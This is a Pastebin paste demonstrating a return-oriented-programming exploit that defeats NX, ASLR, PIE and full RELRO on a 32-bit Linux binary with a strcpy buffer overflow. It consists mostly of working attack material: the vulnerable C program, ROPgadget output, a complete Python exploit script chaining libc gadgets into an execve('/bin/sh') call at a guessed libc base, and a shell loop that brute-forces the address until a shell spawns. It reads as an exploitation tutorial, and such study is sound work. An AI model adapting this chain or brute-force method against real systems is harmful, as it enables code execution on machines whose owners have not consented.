Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO
- Simple binary vuln:
- [jonathan@Archlinux rop-bf]$ cat main.c
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- int main(int argc, char **argv)
- {
- char buff[32];
- strcpy(buff, argv[1]);
- return (0);
- }
- Compiled with "gcc -o main main.c -pie"
- PIE Enable
- ASLR Enable
- NX Enable
- RELRO Full
- Search gadget with ROPgadget
- [jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
- Gadgets information
- ============================================================
- 0x000003e6: pop %edi | ret
- 0x00000405: add $0x08,%esp | pop %ebx | ret
- 0x00000408: pop %ebx | ret
- 0x00000492: mov (%esp),%ebx | ret
- 0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
- 0x0000051e: pop %ebp | ret
- 0x0000054f: call *%eax
- 0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
- 0x00000554: pop %ebx | pop %ebp | ret
- 0x00000595: mov $0x81ffffff,%esi | ret
- 0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
- Unique gadgets found: 11
- Fuck just 11 gadgets found. :/
- So, we search gadget in /lib/libc.so.6 and we bruteforce the base address
- Exploit:
- [jonathan@Archlinux rop-bf]$ cat exploit.py
- #!/usr/bin/python2
- from struct import pack
- base_addr = 0xb770a000
- p = "a" * 44
- # execve /bin/sh generated by RopGadget v3.3
- p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00178020) # @ .data
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
- p += "/bin"
- p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
- p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
- p += "//sh"
- p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
- p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
- p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
- p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00178020) # @ .data
- p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
- p += pack("<I", 0x42424242) # padding
- p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
- p += pack("<I", base_addr + 0x00178020) # @data
- p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
- p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
- p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
- p += pack("<I", base_addr + 0x0002dc45) # int $0x80
- print p
- Ok let's go bruteforce:
- [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- [...]
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- Segmentation fault
- sh-4.2$
- New feature in future ropgadget: ROPmaker for bruteforce Libc
- - http://shell-storm.org/project/ROPgadget/
- @jonathansalwan
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement